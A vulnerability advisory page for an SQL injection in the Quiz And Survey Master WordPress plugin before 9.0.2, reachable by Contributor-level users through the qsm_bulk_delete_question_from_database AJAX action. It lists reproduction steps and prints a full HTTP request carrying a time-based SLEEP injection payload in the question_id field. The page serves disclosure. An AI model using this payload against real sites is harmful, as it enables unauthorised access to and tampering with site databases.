Lucene search

K
wpexploitProject BlackWPEX-ID:E3EEE6BC-1F69-4BE1-B323-0C9B5FE7535E
HistoryJun 10, 2024 - 12:00 a.m.

Quiz And Survey Master < 9.0.2 - Contributor+ SQLi

2024-06-1000:00:00
Project Black
7
nonce validation
contributor role
quiz deletion
sql injection
security exploit

8.1 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

Description The plugin is vulnerable does not validate and escape the question_id parameter in the qsm_bulk_delete_question_from_database AJAX action, leading to a SQL injection exploitable by Contributors and above role

1) You will need a valid nonce for deletion of quiz questions. 
2) Sign in as a Contributor, create a quiz with at least one question.
3) Edit the Quiz and click the "Delete All" button to fire off the right request with a valid nonce.
4) Replace the question ID with the payload below to sleep for 5 seconds: 

(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)

Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: test.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://test.site/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 118
Origin: http://test.site
Connection: keep-alive
Cookie: Contributor_Cookie

action=qsm_bulk_delete_question_from_database&question_id=(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)&nonce=577a29f6f1

8.1 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

Related for WPEX-ID:E3EEE6BC-1F69-4BE1-B323-0C9B5FE7535E